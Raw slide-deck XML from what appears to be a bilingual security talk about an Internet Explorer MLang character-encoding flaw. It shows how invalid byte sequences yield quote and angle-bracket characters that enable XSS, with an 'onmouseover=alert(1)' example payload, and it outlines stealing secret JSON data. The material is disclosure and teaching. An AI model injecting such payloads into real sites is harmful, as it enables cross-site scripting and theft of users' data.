              <a:gd name="adj" fmla="val 13807"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="57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03" y="4077072"/>
            <a:ext cx="1233361" cy="1233361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81114"/>
            <a:ext cx="1368152" cy="136815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MLang encode conversion issue</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のエンコード変換時の問題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23224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IE handles text as Unicode from outside with conversion by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>.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>
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を使って外部からの文字列を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>に変換して処理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0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9752" y="378904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Shift_JIS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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EUC-JP,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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EUC-KR, …</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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808" y="3429000"/>
            <a:ext cx="770680" cy="79208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6" name="右矢印 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="4797152"/>
            <a:ext cx="2376264" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36831"/>
              <a:gd name="adj2" fmla="val 4736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86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2642034" y="4666816"/>
            <a:ext cx="1785950" cy="1714512"/>
            <a:chOff x="5214942" y="928670"/>
            <a:chExt cx="1785950" cy="1714512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="正方形/長方形 8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10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パイ 15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5214942" y="1214422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</a:rPr>
                <a:t>HTML</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1"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4716016" y="4149080"/>
            <a:ext cx="1224136" cy="17281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kumimoji="1" lang="en-US" altLang="ja-JP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MLang</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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948264" y="4077072"/>
            <a:ext cx="1872208" cy="208823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86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7358050" y="4581128"/>
            <a:ext cx="1785950" cy="1714512"/>
            <a:chOff x="5214942" y="928670"/>
            <a:chExt cx="1785950" cy="1714512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="正方形/長方形 43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直角三角形 44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45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パイ 50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5214942" y="1214422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2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Aparajita" pitchFamily="34" charset="0"/>
                  <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                  <a:cs typeface="Aparajita" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;html&gt;</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Aparajita" pitchFamily="34" charset="0"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Aparajita" pitchFamily="34" charset="0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7020272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UTF-16LE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" b="1" dirty="0"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6012160" y="4797152"/>
            <a:ext cx="1296144" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36831"/>
              <a:gd name="adj2" fmla="val 4736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MLang encode conversion issue</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のエンコード変換時の問題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Converted to Unicode accordingly when given broken byte sequence.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>
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>壊れたバイト列を渡したときも、それなりに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>に変換</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>される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pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>"Converted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>accordingly"...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003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>「それなりに変換」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endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0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MLang encode conversion issue</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のエンコード変換時の問題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endParaRPr lang="en-US" altLang="ja-JP" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>meta characters (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>"&lt;&gt;) which don't exist in original byte sequence are generated.</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>もとのバイト列に存在しない「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>」などが生成され、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>につながる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP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MLang encode conversion issue</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のエンコード変換時の問題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340768"/>
            <a:ext cx="8208912" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DAE7F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smtClean="0"/>
              <a:t>&lt;meta http-equiv="Content-Type"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>    content="text/html; charset=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>&lt;input value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(0xNN)(0xNN)(0xNN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>onmouseover=alert(1)// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(0xNN)(0xNN)(0xNN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>" type="text"&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="28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40770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>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>(0xNN)s are invalid byte sequence for charset XXXXX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" b="1" smtClean="0">
              <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>0xNN </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>は文字コード </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>XXXXX </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>において不正なバイト列</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1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4941168"/>
            <a:ext cx="8208912" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DAE7F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smtClean="0"/>
              <a:t>&lt;input value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>onmouseover=alert(1)// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>??"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>" type="text"&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="下矢印 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="4149080"/>
            <a:ext cx="504056" cy="648072"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow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MLang encode conversion issue</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のエンコード変換時の問題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2852936"/>
            <a:ext cx="7787208" cy="1512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kumimoji="1" lang="en-US" altLang="ja-JP" sz="9600" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="960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6" name="乗算記号 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979712" y="2271539"/>
            <a:ext cx="5184576" cy="2232248"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1064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MLang encode conversion issue</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のエンコード変換時の問題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ja-JP" smtClean="0"/>
              <a:t>too hard to prevent XSS  by server-side.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>サーバ側での</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>防止はたいへん</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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validate all letters/bytes as the charset encoding</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文字エンコーディング</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>として適切か</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>全文字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>全バイトを検証</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP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MLang encode conversion issue</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のエンコード変換時の問題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ja-JP" smtClean="0"/>
              <a:t>Not published for details now</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>現状は詳細は非公開</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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Affected : IE6 / IE7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>IE8 : fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Reported : Oct 2007</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP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191683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263691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Target:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Containing secret data in JSON</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>機密情報を含む</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON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pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>If attacker can control a part of JSON string</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻撃者が</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内の一部をコントロールできる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e.g., Web mail notification</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>例えば</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>メールの新着通知など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kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Attacker can read inside data of the JSON</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内のデータを</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>盗み見できる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty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Obfuscated JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>難読化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill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36712"/>
            <a:ext cx="8784976" cy="313932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ＭＳ ゴシック" pitchFamily="49" charset="-128"/>
                <a:ea typeface="ＭＳ ゴシック" pitchFamily="49" charset="-128"/>
              </a:rPr>
